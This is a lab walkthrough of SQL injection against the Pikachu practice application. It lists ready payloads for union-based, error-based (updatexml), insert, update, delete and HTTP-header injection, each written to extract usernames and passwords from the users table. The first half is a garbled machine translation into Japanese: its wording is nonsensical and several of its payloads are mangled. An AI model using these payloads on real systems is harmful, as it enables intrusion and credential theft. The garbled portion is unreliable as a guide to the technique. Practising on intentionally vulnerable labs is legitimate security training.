数値SQLインジェクション(POSTタイプ):
まず、1:
それはポストタイプなので、キャプチャが恒久的施設として改正理由は次のとおりです。
ID = 1または1 = 1
あなたが見ることができ、ページには、すべてのデータが返されました。
文字SQLインジェクション(タイプを取得します):
直接入力:
文字インプラントは近くにSQL文を必要とし、その後、すべてのデータを恒久的施設を追加します。
神戸」または1 = 1#
インジェクションを検索:
文字kトライを検索:
ソースコードを表示します。
選択したユーザー名、ID、「%の$名%」のようなメンバー名からの電子メール:それは、検索のSQL文で、ここで見ることができます
同様に、クロージャは、SQL文を選択することができる:k個の%「または1 = 1位:
すべてのデータを取得します。
XX型インプラント:
データ小包は異なっている:「)または1 = 1#
:(関節)は、例えば、最後のタイプを注射します
3#によって「)順番:フィールドの数を分析します
2#による ')順
フィールドの数が2である知っているかもしれません
その後、取得するために共同データベースクエリを使用しますピカチュウ
')組合選択データベース()、2#
クエリのデータベーステーブル
X ')組合選択TABLE_SCHEMA、TABLE_NAME INFORMATION_SCHEMA.TABLESからTABLE_SCHEMA =' ピカチュウ#
ユーザーテーブルのクエリフィールド名:
ユーザーの#をX 'table_nameは= information_schema.columnsから)組合選択TABLE_NAME、COLUMN_NAME'
ユーザー#から「)組合を選択し、ユーザー名、パスワード:合同調査は、ユーザー名とパスワードを取得します
エラーインジェクション:
条件:背景には、情報のシールドを与えられていません
共通機能:UPDATEXML()exactvalue()床()(床関数)
其他步骤省略(可以根据上面修改payload)。直接得到用户名和密码:
k') and updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)#
insert注入:
插入类型sql语句: insert into member (username ,pw,sex,phonenum,email,address) valuse('hzk','123456',1,123,123,123);
在插入的必填项中:hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
其他步骤相同,复制payload即可。
update注入:
先登录进去,然后在修改信息的框中直接填入语句即可,payload和insert的相同:
hzk' or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
得到用户名和密码
delete类型注入:
删除时抓包看一下:
后台根据id然后删除,发送到repeater,然后改包:
id= 1 or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1)
因为是在url中,所以需要进行url的编码:
得到用户名密码。
Http Header注入:
登陆之后发现有对头部信息的获取,所以可能存在注入
抓包:
修改user-agent或者cookie完成注入:
firefox'or updatexml(1, concat(0x7e,(select (concat_ws('-',username,password)) from pikachu.users limit 0,1) ),1) or '
得到用户名密码。